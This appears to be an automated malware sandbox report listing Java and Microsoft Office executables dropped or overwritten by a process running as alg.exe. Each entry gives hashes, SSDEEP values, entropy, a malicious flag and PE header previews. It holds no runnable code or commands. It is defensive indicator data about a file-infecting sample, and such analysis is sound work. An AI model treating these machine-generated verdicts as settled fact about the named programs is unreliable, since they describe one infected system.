                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:xeSlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:gUsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:4A74C72FB84E2D8C1CABF83FAA8D4115
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:B2DA52257A5179EF69103D1A276BC961C940E1BF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:3DE2368924307EDA312D490DCC8E157954D001AF8B6F9ABDA19E2C4830660693
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:18E206B1DB3F74B8AC307318FDE7C37B419AB0009AFD48DE5C8D2B8C6E4CB6FF8875B367DC7DEB73D99264F49D0C1B856DA83305C303989CBA2D07B7C9CDB79E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................=........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142272
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032987492628072
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:I5/dXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:o1sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:21FD62532D317784E112C0CF84FD56D8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:98033CE8C11FF6C3BCE60546E3499B149A70D571
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:98AAF7EF94559BAAB214EA5B04AA9C870C88F7DF272A48FAD5CDD5FFBD234538
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E188225A58D23F63E68B52A9D15D567D7A6ADC6D7376BBFF7862F681DF051988C7C6D4FBB3C7564FF3F120788B23E24CFD5ADDA1959A18B2CEDBB8692554B8FC
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1202688
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.098055030801865
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:I7DXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:I7DsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:763FE9C5C287C88CF54F2C34E7A58CAD
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:D28F1CEE63A0C9392AED06514A94D4ED0F9BA9A2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:48AE2B05E3900306FBE65362A44760B46382DF06427279261F513C65A7EEF1D1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:68AD815152F4D06A3433CF36075B44EA4C1A21EC4E0EA98D8F0B35CFA4DB9D1C366BEDA03B9F6F80531D286FEC76CC33CEF91947D918FA4810F67BFB98F47B53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@.............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1142784
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.032323852312793
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:ZKQhXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oCsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:2B275D5C395EEAEBFC86AA57DDAF37F2
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:7F2EA0D5599A2B6C296D73B0E24A486B9B84E59E
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C2BC838EC97A0C9D4A803A3A99B97E8A850CE75FED20663FD19F7C84D44380D8
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FAC965033D1C5B9EEE8810C4A5DABFC1ECB6AD8FC2C6F60E57578217EF2B05444CC4C34785578ED39FD1A21B6432DAE6EB2A80291F5097C546B2DD4CF7036297
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................i........................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1298944
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.249105649063561
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:li7l/3roAvsqjnhMgeiCl7G0nehbGZpbD:kl/roATDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:1FC4308F400F18DDBD3459FACB1D2BAF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:352FB54B50F17D2A601C25CC14C38DB3FD0979BF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:9B591C36EC68802C9D54B3D7355BC3365B7A97867D51240C951BFD9E27BA59BB
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:54951698B7736DE8CA9F81A0752FB5990D6428120E3707F96952688A80D10E75D11C53353233C8DC0CBFEA6028AE3F3659C17845BE24484B2849DB6766AC7F11
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0.........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1269248
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.286865484386564
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:25bfQnnXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:2NfQnnsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:3BE2AE3287BDD5CC06A4C7ACB4BB523C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:48F213DF9F923A6B4E5F8A9F194F788861CD1E76
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:89D73A3C7975A10AC46B0B39B2281BBF5F7C941D43F636C01645D6B3DF51B4BC
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:159C6D10F232C0DB5D3247F5FB814ADD31816DE5CA5070B4E5BC2D2C1DD94B987F751D811106CB57BA2DB4F782369709B5E194E1A11E6AA8F8E4A4E4C4830167
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@.................................G.......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.303335955075496
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:7Nmt0LDILi218Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:GLijsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6818B352DA1E44FB89B3BDFC84A17A1F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:60E8E316925C83F04D33EEACBF70EC770E177F1C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:54302DF7ED8343B5F4258B652539DF25E224DCB66E5ACA5483519A83097EB330
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:FEFFDA1D3C4F5A0926DF97DE7318A72E07000475E5C1DC598A529A4C25356374136B1D4CCE7637CC8FB315014DF672860D8C2322B511F85B68182A13A78D2D3A
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1287680
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.303328361462559
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:mNmt0LDILi218Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:VLijsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:8DE3340AC9A62B4F02CDEC83476D0378
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:6B16640F4F61B458351E335608A2BCD5B0E0A04F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:C6ED6804E925D1AA7D4A7416D0B6993FCBEEE5846C2E9B2C74F500B25D64F756
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:A0DACBBD59B8D7B22BBAD9FAFAB208EA8EC72FFB29A7773D8BA28F5B06BCBE0923E36EEF8C043A4AFC57F85EB33D56159D9567F5A41F6834F28A3DC066DB78A5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................._........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1343488
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.236036474810892
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:+juozQMGNUbT/Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:WfjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:6C56DFCD4A3B3D46C035B8AA2D157F95
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A44850AC544691F3C2765C8FFAF9BC3BDE7F21AA
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:DA78B88E0640E2D96679550E2EE2DC9B12DBCC9E44ED0B8F5A8F166316A857FF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:005A13152DC9FD9570ADC567F6F6333997EFA23F70780F19E6D054B125560D62E561CCD02B641F72E5E52891EE07202A69422926E96F2504D32E2DC04306D021
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.....................................h.... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1496064
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.57792157406025
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:JbUO42i/E6sqjnhMgeiCl7G0nehbGZpbD:JJODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:0D08B25E1332C170341C378BEF2E3344
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:A37B098CAB73760066D4E85A1012713FB103CFD4
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:E6A5727E73CB36D094F69E04DAE21142D3E74A4BDB96D22F293163940A0FEE69
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:924C299BCED7C963CF44EB4B1547A5044608549B8AC51B1905274126356842267BCA83E532E166BF9F9CB415A4A140B5D5CABF49B7AD27A7DCF13D22F6151C89
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ......U............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):52712960
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.961838869777366
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:1572864:XLjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:PicZmsR3Lo/cnLe
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:82CBBB095C3F14B7F69DF44B8DD09507
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:95FD74911C0445661A9DFDDC8D89C77E2F841675
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:D5623098244EF6987133DFDC52BE39DA21935A6F333E3D928F082466AA967E50
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C55998D7702B8C6A589802855E0A3202E96EEC2EF2F12C5DF10624D41EB29C0E6B960F4ACCD32129DFCF243DDC74B2DA2AA1E0E97F4B9790C58BFDEBECCE7364
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$......(%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):4993536
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.8111149255628
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:98304:JlkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLvD527BWG:/kkCqaE68eV+0ynE6LvVQBWG
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:656CABB85E1772B81C4E478370E3A7B9
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:85C842DD0E7E6EC6BE377BC4EC6CD7BB1733937F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:7E6E71C746D3BFAD28C82A3F075BE8C7A3F52AA27BB9893EB8A8FDF4FC48C05C
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:E78AAC8769C93733B2C0D4ED73E0240E510EBA1691DE3103E0D375FD499AE52EE79A9E60ACB6558C5E3CD61159E184A4C705044A48CDFCDCB986E27F551A0CCD
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ..*..Z........%......`+...@..........................pL.....h"M......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text.....*.......*................. ..`.rdata........+.......*.............@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1168384
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0446653782806745
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:DFE3DD92E12DB0E750D6E13C9C50ADC1
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:2C85B1FC8CAC10A2CDF0335E3B100039778D8729
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:149657AFD561B49C00D3CC4029D030596BD2522425F8EEE1F18115FA000630C5
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:1CCBD0AE7ED8EA70D72CFB9CDBBC07DD5AAC8B54FA7E9421DFDADCA6CF84ECEF71FFA60E5AD041DC6E74A75C46B557C26F5D21B282E22D69F1E2BA8B95541F5C
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._...........I.....................................................................%...........Rich...........PE..L....[.d............... .F...P......`?.......`....@.................................)P..................................................$...........................P}..8....................i......`d..@............`......4o.......................text....E.......F.................. ..`.rdata.......`... ...J..............@..@.data................j..............@....c2r.....................................rsrc...$...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE

                                                                                                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1522688
                                                                                                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.3306052363275676
                                                                                                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24576:QyAAWSS2H8VsqjnhMgeiCl7G0nehbGZpbD:QIUM8JDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5:92FB4EA6BABF6A78A5F41C5905C3239D
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA1:F3F82D06C41B1104257DA8EAE521D50BCEACF80F
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-256:74D25EE4D1DD9ADBF40C250019459752F4443CE643F6610B92FF56FA4B3CE1BF
                                                                                                                                                                                                                                                                                                                                                                                                                                      SHA-512:C07F756CACFEE07E465F0618DD9707530374A35725041D6138BBBE38247458FFA8FD3C361CD7CD641D60538262DE154F817805625F7ECE20E7C98C9AF62DFD1B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:unknown
